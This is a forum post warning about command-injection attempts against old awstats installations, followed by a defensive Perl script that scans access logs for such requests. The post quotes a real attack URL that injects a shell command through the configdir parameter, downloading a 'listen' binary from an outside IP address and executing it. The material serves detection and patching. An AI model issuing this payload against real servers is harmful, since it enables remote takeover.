Hi monks,
I use awstats, which is a very good webstats app written in Perl. I just had this URL thrown at a web server.
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024 +%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%202 +16%2e102%2e212%2e115;echo%20YYY;echo|
Luckily said directory is password protected and I have the latest patched version.
Probably old news, but just a warning to take some action if you have an old version of this installed. Recent installs should be ok.
There was a CERT warning in February I think. Would hate to see tainted Perl compromise any servers and didn't find it in supersearch, so there you go.
cheerio

Edit g0n - added code tags
Edit g0n - moved from SoPW to News
update CERT link
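
For anyone who wants to check their own access logs for the kind of request quoted in the post, here is an added example (not part of the original post and not awstats code) that flags awstats.pl requests whose configdir parameter decodes to shell metacharacters. The log lines are constructed samples, and the sub names url_decode and check_line are hypothetical.

```perl
use strict;
use warnings;

# Constructed sample access-log lines (not taken from a real server).
my @sample_log = (
    '192.0.2.10 - - [01/Mar/2005:10:00:01 +0000] "GET /awstats/awstats.pl?config=example.org HTTP/1.1" 200 5120',
    '192.0.2.66 - - [01/Mar/2005:10:00:07 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20TEST;echo| HTTP/1.0" 401 480',
    '192.0.2.67 - - [01/Mar/2005:10:00:09 +0000] "GET /cgi-bin/awstats.pl?configdir=%7Cecho%3Becho%2520TEST%7C HTTP/1.0" 200 310',
    '192.0.2.11 - - [01/Mar/2005:10:00:12 +0000] "GET /awstats/awstats.pl?configdir=/etc/awstats HTTP/1.1" 200 4096',
);

# Percent-decode repeatedly (bounded) so double-encoded input is also seen.
sub url_decode {
    my ($s) = @_;
    for (1 .. 3) {
        my $prev = $s;
        $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
        last if $s eq $prev;
    }
    return $s;
}

# Return the reason a log line is suspicious, or undef if it looks clean.
sub check_line {
    my ($line) = @_;
    my ($uri) = $line =~ /"(?:GET|POST|HEAD)\s+(\S+)/ or return;
    my ($path, $query) = split /\?/, $uri, 2;
    return unless defined $query && $path =~ m{/awstats\.pl\z}i;
    for my $pair (split /&/, $query) {
        my ($name, $value) = split /=/, $pair, 2;
        next unless defined $value && lc(url_decode($name)) eq 'configdir';
        my $decoded = url_decode($value);
        next unless $decoded =~ /[|;`\$<>&\x00-\x1f]/;
        $decoded =~ s/[^\x20-\x7e]/?/g;    # keep control bytes out of the report
        return "shell metacharacter in configdir: $decoded";
    }
    return;
}

# The status code matters: 401 means the password protection stopped the
# request, 200 means awstats.pl actually ran with that parameter.
for my $line (@sample_log) {
    my $why = check_line($line);
    my ($ip, $status) = $line =~ /^(\S+).*"\s+(\d{3})\s/;
    print "$ip status=$status ", (defined $why ? "ALERT $why" : "ok"), "\n";
}
```

To run it against a real log, replace the loop over @sample_log with a loop over the lines of your access log; any ALERT with a 200 status on an unpatched install deserves a closer look at that host.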